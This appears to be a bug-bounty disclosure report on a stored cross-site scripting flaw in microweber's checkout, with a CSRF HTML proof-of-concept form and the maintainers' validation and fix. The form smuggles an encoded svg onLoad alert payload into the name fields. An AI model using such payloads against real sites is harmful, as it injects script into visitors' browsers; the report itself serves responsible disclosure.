Cross-site Scripting (XSS) - Stored in microweber/microweber


Reported on

Jun 25th 2021

✍️ Description

Hello, I found CSRF + XSS on website so the impact of XSS could be presented.

There is no CSRF token or protection on: CSRF HTML PoC:

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
      <input type="hidden" name="phone" value="000000000" />
      <input type="submit" value="Submit request" />

and when we submit request XSS gets executed at the same time. Also personal information always stay there so it counts as Stored XSS

Video of me showing everything:

💥 Impact

JS executed on victims browser while the person is in Checkout

2 years ago


Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
microweber/microweber maintainer validated this vulnerability 2 years ago
kirareys has been awarded the disclosure bounty
The fix bounty is now up for grabs
microweber/microweber maintainer marked this as fixed with commit 846a63 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
microweber/microweber maintainer
2 years ago


Hello, thank for the report, this is a valid issue and has been fixed now in this commit

2 years ago


Nice, thanks for attention :) Regards

to join this conversation